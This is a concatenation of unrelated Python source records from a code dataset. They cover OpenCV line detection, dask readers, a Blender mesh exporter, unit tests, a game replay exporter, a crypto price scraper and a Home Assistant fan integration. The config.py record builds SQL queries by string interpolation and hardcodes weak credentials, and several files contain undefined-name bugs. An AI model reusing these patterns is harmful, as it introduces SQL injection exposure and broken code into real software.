gray_imCrop = cv2.cvtColor(copy_imCrop, cv2.COLOR_BGR2GRAY)\n\n # binary image\n ret, thresh1 = cv2.threshold(gray_imCrop, 127, 255, cv2.THRESH_BINARY)\n # print(thresh1)\n \n # draw the reference lines\n # horizontal direction\n # every 3 pixels gets a line\n # calculate the number of lines in horizontal and vertical directions\n nH = np.int0(roi[3] / 3)\n nW = np.int0(roi[2] / 3)\n # get the samples of lines in H- and V directions\n hLine = np.array([])\n vLine = np.array([])\n\n # horizontal direction\n # initialize the cordinates of all sample points in H- direction\n hCoor = np.empty((0, 2), int)\n xPlus1HLine = np.array([]) # f(x+1) for calculate the gradient, \n for i in range(nH):\n # calculate the gradient of each line\n hLine = thresh1[i*3, :] # f(x)\n xPlus1HLine = np.concatenate(([hLine[0]], hLine[0: -1])) # f(x+1)\n hD = xPlus1HLine - hLine # d = f(x+1) - f(x)\n hRes = [idx for idx, val in enumerate(hD) if val != 0] # index of non-zero value\n hSubCoor = np.zeros((len(hRes), 2)) # initialize the sample points for each line\n for idx, val in enumerate(hRes): # coordinate\n hSubCoor[idx][0] = val # x\n hSubCoor[idx][1] = i*3 # y\n hCoor = np.concatenate((hCoor, hSubCoor), axis=0)\n \n # linear model estimation using RANSAC\n XHCoor = hCoor[:, 0]\n TXHCoor = XHCoor.reshape(-1, 1)\n yHCoor = hCoor[:, 1] \n\n # Robustly fit linear model with RANSAC algorithm\n hRansac = linear_model.RANSACRegressor()\n hRansac.fit(TXHCoor, yHCoor)\n hInlierMask = hRansac.inlier_mask_\n hOutlierMask = np.logical_not(hInlierMask)\n\n # Predict data of estimated models\n XHLine = np.arange(TXHCoor.min(), TXHCoor.max())[:, np.newaxis]\n yHLineRansac = hRansac.predict(XHLine)\n hX0 = np.int0(XHLine[0][0])\n hy0 = np.int0(yHLineRansac[1])\n hX1 = np.int0(XHLine[-1][0])\n hy1 = np.int0(yHLineRansac[-1])\n\n # Estimated coefficients\n # print(\"Estimated RANSAC coefficients: \" + float(ransac.estimator_.coef_))\n\n # Draw line\n hColor = (0, 255, 0)\n cv2.line(copy_imCrop, (hX0, hy0), (hX1, hy1), hColor, 2)\n\n \n # vertical direction\n # initialize the cordinates of all sample points in V- direction\n vCoor = np.empty((0, 2), float)\n xPlus1VLine = np.array([]) # f(x+1) for calculate the gradient, \n for i in range(nW):\n # calculate the gradient of each line\n vLine = thresh1[:, i*3] # f(x)\n xPlus1VLine = np.concatenate(([vLine[0]], vLine[0: -1])) # f(x+1)\n vd1 = xPlus1VLine - vLine # d = f(x+1) - f(x)\n vRes = [idx for idx, val in enumerate(vd1) if val != 0] # index of non-zero value\n vSubCoor = np.zeros((len(vRes), 2)) # initialize the sample points for each line\n for idx, val in enumerate(vRes): # coordinate\n vSubCoor[idx][0] = i*3 # y\n vSubCoor[idx][1] = val # x\n vCoor = np.concatenate((vCoor, vSubCoor), axis=0)\n\n # linear model estimation using RANSAC\n XVCoor = vCoor[:, 0]\n TXVCoor = XVCoor.reshape(-1, 1)\n yVCoor = vCoor[:, 1]\n\n # Robustly fit linear model with RANSAC algorithm\n vRansac = linear_model.RANSACRegressor()\n vRansac.fit(TXVCoor, yVCoor)\n vInlierMask = vRansac.inlier_mask_\n vOutlierMask = np.logical_not(vInlierMask)\n\n # Predict data of estimated models\n XVLine = np.arange(TXVCoor.min(), TXVCoor.max())[:, np.newaxis]\n yVLineRansac = vRansac.predict(XVLine)\n vX0 = np.int0(XVLine[0][0])\n vy0 = np.int0(yVLineRansac[1])\n vX1 = np.int0(XVLine[-1][0])\n vy1 = np.int0(yVLineRansac[-1])\n\n # Estimated coefficients\n # print(\"Estimated RANSAC coefficients: \" + float(ransac.estimator_.coef_))\n\n # Draw line\n vColor = (255, 0, 0)\n cv2.line(copy_imCrop, (vX0, vy0), (vX1, vy1), vColor, 2)\n\n '''\n # Calculate the intersection point\n # iP = lineLineIntersection([hX0, hy0], [hX1, hy1], [vX0, vy0], [vX1, vy1])\n \n # Line AB represented as m1x + b1 = y\n m1 = (hy1 - hy0)/(hX1 - hX0)\n b1 = hy1 - m1 * hX1\n \n # Line CD represented as m2x + b2 = y\n m2 = (vy1 - vy0)/(hX1 - hX0)\n b2 = vy1 - m2 * vX1 \n\n xi = (b1-b2) / (m2-m1)\n yi = m1 * xi + b1\n \n # print(\"[\" + str(xi) + \", \" + str(yi) + \"]\")\n cv2.rectangle(copy_imCrop, (np.int0(xi) - 2, np.int0(yi) - 2), (np.int0(xi) + 2, np.int0(yi) + 2), (0, 128, 255), -1)\n \n\n if ii == 1:\n y0 = yi\n ydisp_global = y0 - yi\n ydisp_global_plot = np.append(ydisp_global_plot, ydisp_global) \n ''' \n \n cv2.imshow(\"IntersectionPoint is Detected\", np.hstack([imCrop, copy_imCrop]))\n \n # Frames are read by intervals of 1 millisecond. The programs breaks out of the while loop when the user presses the 'q' key\n k = cv2.waitKey(30) & 0xff\n if k == ord('q'):\n break\n elif k == ord('s'):\n cv2.imwrite('SquareMatching' + str(ii) + '.png', copy_imCrop)\n # index of frame\n else:\n break\n\nnp.savetxt('data_I_S_47.csv', ydisp_global_plot, delimiter=',')\n'''\n# plot-yflow\nplt.plot(ydisp_global_plot)\n# plt.axis([0, 700, -5, 30]) # 48\nplt.ylabel('Displcement (pixels)')\nplt.xlabel('Time (Frame)')\nplt.title('Vertical Displacement')\nplt.savefig('I_vDisp_47.png')\nplt.show()\n'''\n# The following frees up resources and closes all windows\ncap.release()\ncv2.destroyAllWindows()","sub_path":"LinesDetectionFourCornersDetection_woO.py","file_name":"LinesDetectionFourCornersDetection_woO.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"83654935","text":"import logging\r\n\r\nimport dask.array as da\r\nfrom dask.distributed import get_client\r\nfrom dask import delayed\r\n\r\n__all__ = [\"read_h5\", \"read_nifti\", \"read_tiff\"]\r\n\r\nlogger = logging.getLogger(\"segmentation.pipeline.tasks\")\r\n\r\n\r\ndef read_h5(uri, path=\"/\"):\r\n import h5py\r\n\r\n client = get_client()\r\n with h5py.File(uri, \"r\") as h:\r\n data = da.from_array(h[path], chunks=\"auto\")\r\n data = client.persist(data)\r\n\r\n return data\r\n\r\n\r\ndef read_nifti(uri):\r\n import SimpleITK as sitk\r\n\r\n data = sitk.ReadImage(uri)\r\n data = sitk.GetArrayFromImage(data)\r\n\r\n client = get_client()\r\n data = da.from_array(data, chunks=\"auto\")\r\n\r\n return data\r\n\r\n\r\ndef read_tiff(uri):\r\n import imageio\r\n\r\n data = imageio.volread(uri)\r\n\r\n client = get_client()\r\n data = da.from_array(data, chunks=\"auto\")\r\n\r\n return data\r\n","sub_path":"segmentation/pipeline/tasks/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510339153","text":"#!BPY\n\n\"\"\"\nName 'Oolite DAT'\nBlender: 263\nGroup: 'Export'\nTooltip 'Oolite mesh exporter'\n\"\"\"\n\nbl_info = {\n\t\"name\":\t\t\"Oolite (.dat)\",\n\t\"author\":\t\"Ben Merritt\",\n\t\"blender\":\t(2,6,3),\n\t\"version\":\t(0,0,1),\n\t\"location\":\t\"File > Import-Export\",\n\t\"description\": \"Exports the selected mesh to an Oolite .dat file\",\n\t\"category\": \"Import-Export\",\n}\n\n# TODO:\n# * Material/texture support\n\nimport os.path\n#from types import *\n\nimport bpy\nimport mathutils\n\n# Converts vectors in Blender's coordinate system to Oolite's coordinate system\ndef convertCoords(vec):\n\treturn mathutils.Vector((vec.x, vec.z, -vec.y))\n\ndef formatVector(vec):\n\treturn \"{},{},{}\".format(vec.x, vec.y, vec.z)\n\ndef formatTex(tc):\n\treturn \"{} {}\".format(vec.x, vec.y)\n\nclass Exporter(object):\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\t\t# Mesh data to be written out\n\t\tself.verts_out = []\n\t\tself.norms_out = []\n\t\tself.faces_out = []\n\t\tself.uvs_out = []\n\t\t# Keeps track of smooth verts' indices in verts_out so we can share them between\n\t\t# faces\n\t\tself.written_smooth_verts = {}\n\n\t# TODO: break up into smaller methods.\n\tdef write(self):\n\t\tobject = bpy.context.active_object\n\t\tif object.type != \"MESH\":\n\t\t\traise Exception(\"Invalid active object; must be a mesh\")\n\n\t\t# Write mesh data.\n\t\tverts = []\n\t\tnormals = []\n\n\t\t# Apply modifiers.\n\t\tmesh = object.to_mesh(bpy.context.scene, True, \"PREVIEW\")\n\n\t\ttry:\n\t\t\tfor v in mesh.vertices:\n\t\t\t\tverts.append(convertCoords(v.co))\n\t\t\t\tnormals.append(convertCoords(v.normal))\n\n\t\t\tuvs = None\n\n\t\t\tif len(mesh.tessface_uv_textures) > 0:\n\t\t\t\tuvs = mesh.tessface_uv_textures[0]\n\n\t\t\tfor face in mesh.tessfaces:\n\t\t\t\tface_out = []\n\t\t\t\ttex_name = None\n\t\t\t\tif uvs is not None:\n\t\t\t\t\ttex_name = os.path.basename(uvs.data[face.index].image.filepath)\n\t\t\t\t\tif tex_name is None:\n\t\t\t\t\t\traise Exception(\"Face with missing texture\")\n\n\t\t\t\tdef writeTri(vertex_numbers):\n\t\t\t\t\ttri_out = \",\".join((str(face_out[vn]) for vn in vertex_numbers))\n\t\t\t\t\tself.faces_out.append(\"0,0,0 {} 3,{}\\n\".format(formatVector(convertCoords(face.normal)), tri_out))\n\t\t\t\t\tif uvs is not None:\n\t\t\t\t\t\tface_uvs = uvs.data[face.index].uv\n\t\t\t\t\t\t# Formats UV coords for each face (\"v1x,v1y v2x,v2y ...\")\n\t\t\t\t\t\tuv_out = \" \".join(\",\".join((str(coord) for coord in (face_uvs[vn]))) for vn in vertexNumbers)\n\t\t\t\t\t\tself.uvs_out.append(\"{} 1.0,1.0 {}\\n\".format(texName, uv_out))\n\n\t\t\t\tfor vert_num in face.vertices:\n\t\t\t\t\t# TODO: rename to vert_num_out?\n\t\t\t\t\tvert_out = None\n\t\t\t\t\tif(face.use_smooth):\n\t\t\t\t\t\tif vert_num in written_smooth_verts:\n\t\t\t\t\t\t\tvert_out = writtenSmoothVerts[vert_num]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tvert_out = len(self.verts_out)\n\t\t\t\t\t\t\twritten_smooth_verts[vert_num] = vert_out\n\t\t\t\t\t\t\tself.verts_out.append(formatVector(verts[vert_num]) + \"\\n\")\n\t\t\t\t\t\t\tself.norms_out.append(formatVector(normals[vert_num]) + \"\\n\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tvert_out = len(self.verts_out)\n\t\t\t\t\t\tself.verts_out.append(formatVector(verts[vert_num]) + \"\\n\")\n\t\t\t\t\t\tself.norms_out.append(formatVector(convertCoords(face.normal)) + \"\\n\")\n\t\t\t\t\tface_out.append(vert_out)\n\n\t\t\t\twriteTri([2, 1, 0])\n\t\t\t\t#If this is a quad, add another triangle to fill it out.\n\t\t\t\tif len(face_out) == 4:\n\t\t\t\t\twriteTri([0, 3, 2])\n\t\tfinally:\n\t\t\t# Remove the temporary mesh.\n\t\t\tbpy.data.meshes.remove(mesh)\n\n\t\twith open(self.filename, 'w') as out:\n\t\t\tout.write(\"NVERTS %d\\n\" % len(self.verts_out))\n\t\t\tout.write(\"NFACES %d\\n\" % len(self.faces_out))\n\n\t\t\tout.write(\"VERTEX\\n\")\n\t\t\tout.writelines(self.verts_out)\n\n\t\t\tout.write(\"FACES\\n\")\n\t\t\tout.writelines(self.faces_out)\n\n\t\t\tif uvs is not None:\n\t\t\t\tout.write(\"TEXTURES\\n\")\n\t\t\t\tout.writelines(uvs_out)\n\n\t\t\tout.write(\"NORMALS\\n\")\n\t\t\tout.writelines(self.norms_out)\n\n\t\t\tout.write(\"END\\n\")\n\nclass ExportOperator(bpy.types.Operator):\n\t\"\"\"Exporter for Oolite .dat meshes\"\"\"\n\tbl_idname = \"export.oolite_dat\"\n\tbl_label = \"Export Oolite .dat mesh\"\n\tbl_options = {'PRESET'}\n\n\tfilename_ext = \".dat\"\n\n\tfilepath = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n\t@classmethod\n\tdef poll(cls, context):\n\t\treturn True\n\n\tdef execute(self, context):\n\t\t# TODO: put all the write code in here.\n\t\tExporter(self.filepath).write()\n\t\treturn {'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\tcontext.window_manager.fileselect_add(self)\n\t\treturn {'RUNNING_MODAL'}\n\ndef menu_func(self, context):\n\tself.layout.operator_context = 'INVOKE_DEFAULT'\n\tself.layout.operator(ExportOperator.bl_idname, text=\"Oolite (.dat)\")\n\ndef register():\n\tbpy.utils.register_class(ExportOperator)\n\tbpy.types.INFO_MT_file_export.append(menu_func)\n\ndef unregister():\n\tbpy.utils.unregister_class(Exporter)\n\tbpy.types.INFO_MT_file_export.remove(menu_func)\n\nif __name__ == \"__main__\":\n\tregister()\n","sub_path":"Blender/export_oolite.py","file_name":"export_oolite.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556891785","text":"import os\n\nimport unittest\nimport tempfile\nimport json\n\nimport gcsdataset\n\n# A minimally small valid jpeg file\nimg = b'\\xff\\xd8\\xff\\xdb\\x00C\\x00\\x03\\x02\\x02\\x02\\x02\\x02\\x03\\x02\\x02\\x02\\x03\\x03\\x03\\x03\\x04\\x06\\x04\\x04\\x04\\x04\\x04\\x08\\x06\\x06\\x05\\x06\\t\\x08\\n\\n\\t\\x08\\t\\t\\n\\x0c\\x0f\\x0c\\n\\x0b\\x0e\\x0b\\t\\t\\r\\x11\\r\\x0e\\x0f\\x10\\x10\\x11\\x10\\n\\x0c\\x12\\x13\\x12\\x10\\x13\\x0f\\x10\\x10\\x10\\xff\\xc9\\x00\\x0b\\x08\\x00\\x01\\x00\\x01\\x01\\x01\\x11\\x00\\xff\\xcc\\x00\\x06\\x00\\x10\\x10\\x05\\xff\\xda\\x00\\x08\\x01\\x01\\x00\\x00?\\x00\\xd2\\xcf \\xff\\xd9'\n\n\nclass TestGCSDataset(unittest.TestCase):\n def setUp(self):\n self.dirs = [\"a\", \"b\"]\n self.directory = tempfile.TemporaryDirectory()\n self.dirname = self.directory.name\n self.count = 0\n self.paths = []\n for key in self.dirs:\n # create the dir/${label}/file.JPEG structure\n path = os.path.join(self.dirname, key)\n os.makedirs(path)\n self.count += 1\n fname = os.path.join(path, \"file.JPEG\")\n with open(fname, \"wb\") as f:\n f.write(img)\n self.paths.append(fname)\n\n def tearDown(self):\n self.directory.cleanup()\n\n def test_make_dataset(self):\n ds = gcsdataset.make_dataset(\n self.paths, extensions=(\".JPEG\",))\n self.assertEqual(len(ds), self.count,\n \"Expected {} items got {}\".format(self.count, len(ds)))\n\n\nclass TestImageFolder(unittest.TestCase):\n def setUp(self):\n self.classes_to_idx = {b\"a\": 0, b\"b\": 1}\n self.directory = tempfile.TemporaryDirectory()\n self.dirname = self.directory.name.encode('utf-8')\n self.count = 0\n self.paths = []\n for key in self.classes_to_idx.keys():\n # create the dir/${label}/file.JPEG structure\n path = os.path.join(self.dirname, key)\n os.makedirs(path)\n self.count += 1\n fname = os.path.join(path, b\"file.JPEG\")\n with open(fname, \"wb\") as f:\n f.write(img)\n self.paths.append(fname.decode('utf-8'))\n self.paths.sort()\n\n def tearDown(self):\n self.directory.cleanup()\n\n def test_image_folder(self):\n ds = gcsdataset.ImageFolder(root=self.directory.name)\n vals = list(ds)\n self.assertEqual(len(vals), self.count,\n \"Expected {} items got {}\".format(self.count, len(vals)))\n\n def test_index_cache(self):\n index_path = os.path.join(self.directory.name, \"vals.json\")\n ds = gcsdataset.ImageFolder(\n root=self.directory.name, index_path=index_path)\n self.assertTrue(os.path.exists(index_path), \"Index path exists\")\n # Bad test practice here: verify cache data is expected structure\n with open(index_path) as f:\n paths = json.loads(f.read())\n self.assertEqual(paths, self.paths)\n\n\nclass TestTrainScript(unittest.TestCase):\n def test_import_train_script(self):\n import test_train_mp_imagenet\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_gcsdataset.py","file_name":"test_gcsdataset.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613174484","text":"\"\"\"Contain all config setting for module\nmachine learning\n\"\"\"\n\n\nimport os\nimport sqlite3\nimport json\nfrom datetime import datetime\n\nimport MySQLdb\n\n\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n\n\nMODEL_CURVES_REG = os.path.join(BASEDIR, 'files', 'curves_reg')\n\n\nMODEL_CURVES_CLF = os.path.join(BASEDIR, 'files', 'curves_clf')\n\n\nMODEL_ANFIS = os.path.join(BASEDIR, 'files', 'anfis')\n\n\nMODEL_CRP = os.path.join(BASEDIR, 'files', 'crp')\n\n\nSQLITE_PATH = os.path.join(BASEDIR, 'files', 'wipm-dev.db')\n\n\nROUTES = {\n 'TRAIN_REGRESSION': '/wipm/regression/model',\n 'PREDICT_REGRESSION': '/wipm/regression/predict',\n\n 'TRAIN_CLASSIFICATION': '/wipm/classification/model',\n 'PREDICT_CLASSIFICATION': '/wipm/classification/predict',\n\n 'TRAIN_CRP': '/wipm/crp/model',\n 'PREDICT_CRP': '/wipm/crp/predict',\n 'ANFIS': '/wipm/anfis/predict',\n 'DELETE_MODEL': '/wipm/models',\n\n 'GET_RESULT_TRAIN': '/wipm/result/train',\n 'GET_RESULT_PREDICT': '/wipm/result/predict',\n 'GET_ALL_MODEL': '/wipm/models',\n}\n\n\nBROKER = {\n 'TOPIC_JOBS': '/wi-ml/jobs',\n 'USERNAME': 'wi-ml',\n 'PASSWORD': '123456',\n 'PROTOCOLS': 'websockets',\n}\n\n\nWIPM_CLIENT = {\n 'ID': 'wipm',\n 'HOST': '127.0.0.1',\n 'PORT': 1883,\n 'QOS': 2,\n}\n\n\nML_CLIENT = {\n 'ID': 'ml_service',\n 'HOST': '127.0.0.1',\n 'PORT': 1883,\n 'QOS': 2,\n}\n\ndb = MySQLdb.connect('localhost', 'wipm', '', 'wipm')\ncur = db.cursor()\n\ndef get_now():\n return datetime.now().strftime(('%Y-%m-%d %H:%M:%S'))\n\ndef store_train_result(model_id, result):\n global cur\n global db \n sql = \"SELECT id FROM train WHERE model_id='%s'\" % model_id \n cur.execute(sql)\n instance = cur.fetchone()\n if instance is None:\n sql = \"INSERT INTO train(model_id, result) VALUES ('%s','%s')\" % (model_id, json.dumps(result))\n cur.execute(sql)\n else: \n sql = \"UPDATE train SET result='%s' WHERE model_id='%s'\" % (json.dumps(result), model_id)\n cur.execute(sql)\n db.commit()\n\ndef del_train_result(model_id):\n global cur\n global db \n sql = \"DELETE FROM train WHERE model_id='%s'\" % model_id \n cur.execute(sql)\n db.commit()\n\ndef store_predict_result(model_id, result):\n global cur\n global db \n sql = \"SELECT id FROM predict WHERE model_id='%s'\" % model_id\n cur.execute(sql)\n instance = cur.fetchone()\n if instance is None:\n sql = \"INSERT INTO train(model_id, result) VALUES ('%s','%s')\" % (model_id, json.dumps(result))\n cur.execute(sql)\n else: \n sql = \"UPDATE train SET result='%s' WHERE model_id='%s'\" % (json.dumps(result), model_id)\n cur.execute(sql)\n db.commit()\n","sub_path":"service/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"303713311","text":"import pytest\nimport os\n\n\n@pytest.fixture\ndef default_exporter():\n from environment.Battlesnake.exporter.Exporter import Exporter\n return Exporter(output_folder=\"replay_test\")\n\n@pytest.fixture\ndef basic_exporter():\n from environment.Battlesnake.exporter.Exporter import Exporter\n return Exporter(output_folder=\"replay_test\", file_name=\"test.replay\")\n\n@pytest.fixture\ndef sample_env():\n from agents.RandomAgent import RandomAgent\n from agents.SimpleAgent_solution import SimpleAgent\n from environment.battlesnake_environment import BattlesnakeEnvironment\n \n agents = [RandomAgent(), SimpleAgent()]\n env = BattlesnakeEnvironment(\n width=15,\n height=15,\n agents=agents,\n act_timeout=0.2\n )\n env.reset()\n return env\n\ndef test_directory_created(basic_exporter):\n assert os.path.exists(\"replay_test\")\n\ndef test_game_info(basic_exporter):\n from environment.Battlesnake.model.GameInfo import GameInfo\n g = GameInfo(game_id=\"test\", ruleset_name=\"standard\", ruleset_version=\"1.0.0\", timeout=500)\n basic_exporter.add_initial_state(game_info=g)\n basic_exporter.write_replay_to_file()\n\n expected = str({\"game\": g.export_json(), \"total_turns\": 0, \"moves\": []}).replace(\"'\", '\"')\n with open(\"replay_test/test.replay\", \"r\", encoding=\"utf-8\") as f:\n result = f.read()\n\n print(expected)\n print(result)\n assert expected == result\n os.unlink(\"replay_test/test.replay\")\n\ndef test_board_state_write(basic_exporter):\n from environment.Battlesnake.model.GameInfo import GameInfo\n from environment.Battlesnake.modes.Standard import StandardGame\n from environment.Battlesnake.model.Snake import Snake\n\n g = GameInfo(game_id=\"test\", ruleset_name=\"standard\", ruleset_version=\"1.0.0\", timeout=400)\n basic_exporter.add_initial_state(game_info=g)\n \n game = StandardGame()\n game.create_initial_board_state(width=15, height=15, snake_ids=[\"1\", \"2\"])\n basic_exporter.add_latest_game_step(game)\n basic_exporter.write_replay_to_file()\n\n expected = str({\"game\": g.export_json(), \"total_turns\": 1, \"moves\": [{\n \"height\": 15,\n \"width\": 15,\n \"food\": [f.export_json() for f in game.state.food],\n \"snakes\": [s.export_json() for s in game.state.all_snakes]\n }]}).replace(\"'\", '\"').replace(\"None\", \"null\").replace(\"(\", \"[\").replace(\")\", \"]\")\n\n \n with open(\"replay_test/test.replay\", \"r\") as f:\n result = f.read()\n\n assert expected == result\n os.unlink(\"replay_test/test.replay\")\n\ndef test_full_replay_cycle():\n from environment.battlesnake_environment import BattlesnakeEnvironment\n from agents.RandomAgent import RandomAgent\n from environment.Battlesnake.importer.Importer import Importer\n from environment.Battlesnake.renderer.game_renderer import GameRenderer\n\n agents = [RandomAgent(), RandomAgent()]\n\n env = BattlesnakeEnvironment(\n width=15,\n height=15,\n agents=agents,\n act_timeout=0.1,\n export_games=True\n )\n\n env.reset()\n\n while not env.game.is_game_over():\n env.step()\n\n assert os.path.exists(env.exporter.outpath)\n assert os.path.getsize(env.exporter.outpath) > 0\n game, turns, move_list = Importer.load_replay_file(env.exporter.outpath)\n\n width, height = move_list[0].width, move_list[0].width\n num_snakes = len(move_list[0].snakes)\n\n renderer = GameRenderer(width, height, num_snakes)\n\n assert len(move_list) >= 1\n assert len(move_list) == turns\n assert game\n\n for move in move_list:\n renderer.display(move)\n \n os.unlink(env.exporter.outpath)\n\n # TODO: Could be moved special place, so that always at the end\n import shutil\n shutil.rmtree(\"replays\", ignore_errors=True)\n shutil.rmtree(\"replay_test\", ignore_errors=True)","sub_path":"environment/Battlesnake/tests/test_exporter.py","file_name":"test_exporter.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403322956","text":"#!/usr/bin/python\n#/*Copyright (c) 2013 Chris Knorowski \n# *\n__author__ = 'cknorow@gmail.com (Chris knorowski)'\n\n\nimport sys\nimport string\nimport datetime\nimport logging\n\nimport webapp2\nfrom google.appengine.ext import db\n\nfrom grab_rate import currency as cryptsy\nfrom grab_rate import coinbasebtc\nfrom grab_rate import mtgoxbtc\n\n\nfrom models import BTCurrency\nfrom models import AltCurrency\nimport util\n\n#Workhorse class scrapes currency info and stores it into database\nclass WorkHorse:\n def __init__(self, Label, key_name, debug=False, write_database = False):\n #grab values from memcache\n self.write_database = write_database\n self.BTCurrency = util.get_btc()\n self.AltCurrency = util.get_alt_data(key_name, write_database)\n self.key_name=key_name\n if (self.BTCurrency is None):\n logging.error(\"BTCurrency does not exist\")\n if len(list(set(self.AltCurrency.get_by_key_name(key_name).currency).symmetric_difference(set(Label)))) != 0:\n self.write_database = True\n self.adjust_database(Label)\n\n\n #check and see if the prices were actually update\n def adjust_database(self, Label):\n self.AltCurrency = util.get_alt_data(self.key_name, datastore=True)\n self.AltCurrency.currency = Label\n self.AltCurrency.put()\n\n #check and see if the prices were actually update\n def check(self, updated, last, s = False):\n for i,j in enumerate(updated):\n try:\n if j == \"noupdate\":\n updated[i] = last[i]\n except:\n updated[i] = 0.0\n if s:\n updated[i] = ''\n return updated\n\n #update mtgox and coinbase prices\n def update_btc_prices(self):\n # Get coinbase btc price\n self.BTCurrency.price = self.check([coinbasebtc(),mtgoxbtc()],[0.0,0.0])\n self.BTCurrency.timestamp = datetime.datetime.now()\n self.BTCurrency.put()\n\n #Scrape and update prices\n def update_prices(self):\n # Get the altcoin prices from cryptsy \n pricealts = []\n marketalts = []\n volumealts = []\n time_to_sell = []\n weighted_buy = []\n weighted_sell = []\n\n for coin in self.AltCurrency.currency:\n market, price, volume, to_sell, ws, wb = cryptsy(coin)\n marketalts.append(market)\n pricealts.append(price)\n volumealts.append(volume)\n time_to_sell.append(to_sell)\n weighted_buy.append(wb)\n weighted_sell.append(ws)\n \n self.AltCurrency.marketname = self.check(marketalts,self.AltCurrency.marketname, s =True)\n self.AltCurrency.price = self.check(pricealts,self.AltCurrency.price)\n self.AltCurrency.volume = self.check(volumealts,self.AltCurrency.volume)\n self.AltCurrency.time_to_sell = self.check(time_to_sell,self.AltCurrency.time_to_sell)\n self.AltCurrency.weighted_buy = self.check(weighted_buy,self.AltCurrency.weighted_buy)\n self.AltCurrency.weighted_sell = self.check(weighted_sell,self.AltCurrency.weighted_sell)\n self.AltCurrency.timestamp = datetime.datetime.now()\n self.AltCurrency.put()\n #update the memcache after we write specifically to the database\n if self.write_database:\n AltCurrency = util.get_alt_data(self.key_name)\n AltCurrency = self.AltCurrency\n AltCurrency.put()\n\n\n","sub_path":"web/workhorse.py","file_name":"workhorse.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506747731","text":"import os\r\nimport xlwt\r\n\r\ndir_ben = 'E:/data/benign'\r\ndir_mal = 'E:/data/malignant'\r\nf = xlwt.Workbook()\r\nsheet1 = f.add_sheet('test', cell_overwrite_ok= False)\r\nnum = 0\r\nfor files in os.listdir(dir_ben):\r\n if os.path.isdir(os.path.join(dir_ben, files)):\r\n sheet1.write(num, 0, files + '.jpg')\r\n sheet1.write(num, 1, '0')\r\n num += 1\r\n\r\nfor files in os.listdir(dir_mal):\r\n if os.path.isdir(os.path.join(dir_mal, files)):\r\n sheet1.write(num, 0, files + '.jpg')\r\n sheet1.write(num, 1, '1')\r\n num += 1 \r\n\r\nf.save('label.xls')","sub_path":"old_project/project/imgPre/fold2excel.py","file_name":"fold2excel.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41000848","text":"\"\"\"Platform for light integration.\"\"\"\nimport asyncio\nimport logging\nfrom functools import partial\n\nimport homeassistant.helpers.config_validation as cv\nimport voluptuous as vol\nfrom homeassistant.components import fan\nfrom homeassistant.components.fan import (\n ATTR_SPEED, \n PLATFORM_SCHEMA,\n SPEED_HIGH, \n SPEED_LOW, \n SPEED_MEDIUM,\n SPEED_OFF, \n SUPPORT_OSCILLATE,\n SUPPORT_SET_SPEED, \n FanEntity)\nfrom homeassistant.const import CONF_HOST, CONF_NAME, CONF_TOKEN\nfrom homeassistant.exceptions import PlatformNotReady\nfrom homeassistant.util import color\nfrom miio.device import Device\nfrom miio.exceptions import DeviceException\nfrom miio.miot_device import MiotDevice\n\nfrom . import GenericMiotDevice, ToggleableMiotDevice\nfrom .deps.const import (\n DOMAIN,\n CONF_UPDATE_INSTANT,\n CONF_MAPPING,\n CONF_CONTROL_PARAMS,\n CONF_CLOUD,\n CONF_MODEL,\n ATTR_STATE_VALUE,\n ATTR_MODEL,\n ATTR_FIRMWARE_VERSION,\n ATTR_HARDWARE_VERSION,\n SCHEMA,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = \"Generic MIoT fan\"\nDATA_KEY = \"fan.\" + DOMAIN\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n # {\n # vol.Required(CONF_HOST): cv.string,\n # vol.Required(CONF_TOKEN): vol.All(cv.string, vol.Length(min=32, max=32)),\n # vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n # vol.Optional(CONF_UPDATE_INSTANT, default=True): cv.boolean,\n # vol.Optional(CONF_CLOUD): vol.All(),\n \n # vol.Required(CONF_MAPPING):vol.All(),\n # vol.Required(CONF_CONTROL_PARAMS):vol.All(),\n\n # }\n SCHEMA\n)\n\n# pylint: disable=unused-argument\n@asyncio.coroutine\ndef async_setup_platform(hass, config, async_add_devices, discovery_info=None):\n \"\"\"Set up the fan from config.\"\"\"\n\n if DATA_KEY not in hass.data:\n hass.data[DATA_KEY] = {}\n\n host = config.get(CONF_HOST)\n token = config.get(CONF_TOKEN)\n mapping = config.get(CONF_MAPPING)\n\n _LOGGER.info(\"Initializing %s with host %s (token %s...)\", config.get(CONF_NAME), host, token[:5])\n\n try:\n miio_device = MiotDevice(ip=host, token=token, mapping=mapping)\n device_info = miio_device.info()\n model = device_info.model\n _LOGGER.info(\n \"%s %s %s detected\",\n model,\n device_info.firmware_version,\n device_info.hardware_version,\n )\n\n device = MiotFan(miio_device, config, device_info, hass)\n except DeviceException:\n raise PlatformNotReady\n\n hass.data[DATA_KEY][host] = device\n async_add_devices([device], update_before_add=True)\n \nasync def async_setup_entry(hass, config_entry, async_add_entities):\n config = 